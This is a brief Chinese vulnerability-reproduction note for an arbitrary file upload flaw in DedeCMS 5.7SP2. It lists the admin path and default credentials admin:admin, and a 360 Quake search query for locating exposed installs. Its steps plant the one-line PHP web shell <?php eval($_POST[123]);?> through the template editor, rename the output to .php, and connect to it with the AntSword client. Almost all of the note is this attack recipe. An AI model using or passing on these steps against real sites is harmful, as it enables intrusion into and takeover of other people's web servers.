K17-1开源-dedecms-任意文件上传

漏洞描述：

Desdev DedeCMS（织梦内容管理系统）是中国卓卓网络（Desdev）公司的一套基于PHP的开源内容管理系统（CMS）。该系统具有内容发布、内容管理、内容编辑和内容检索等功能。 Desdev DedeCMS 5.7SP2版本中存在安全漏洞。远程攻击者可通过在添加新模板时，将文件名/index.html更改成/index.php利用该漏洞向uploads/目录上传.php文件并执行该文件。 后台路径：/uploads/dede/ 后台密码：admin:admin

网站图片：

360quake语法：

app: “DedeCMS织梦内容管理系统”

漏洞复现：

通过后台登录，在模版-默认模版管理-新建模版

在内容框输入php脚本后保存

<?php eval($_POST[123]);?>

生成-更新主页HTML-浏览选择新建的模版-更改后缀为php…

使用蚁剑进行连接